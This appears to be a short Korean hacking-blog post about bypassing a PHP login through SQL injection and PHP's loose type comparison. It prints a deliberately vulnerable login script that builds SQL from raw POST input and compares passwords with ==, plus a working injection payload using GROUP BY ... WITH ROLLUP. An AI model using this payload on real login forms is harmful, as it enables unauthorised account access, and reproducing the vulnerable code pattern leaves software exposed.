Hacking/WEB Hacking
Web@PHP# PHP자료형 비교 취약점으로 인한 로그인 우회
hi0802
2017. 1. 12. 11:20
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | <?php include '../lib/session.php'; include '../lib/connect_db.php'; $userid=$_POST[userid]; $passwd=$_POST[passwd]; #$sql="select * from users where userid='$userid' and passwd='$passwd'"; $result=mysql_query($sql, $connect); $list=mysql_num_rows($result); $q = mysql_query("SELECT * FROM users WHERE userid = '$userid'"); if(mysql_num_rows($q) == 1) { $user = mysql_fetch_array($q); if($user['passwd'] == $passwd) { print "Login Success\n"; } else { print "Login failed!"; } } else { print "Login failed!"; } mysql_query($connect); ?> | cs |
hi0802' group by passwd WITH ROLLUP LIMIT 1 OFFSET 1 #
참고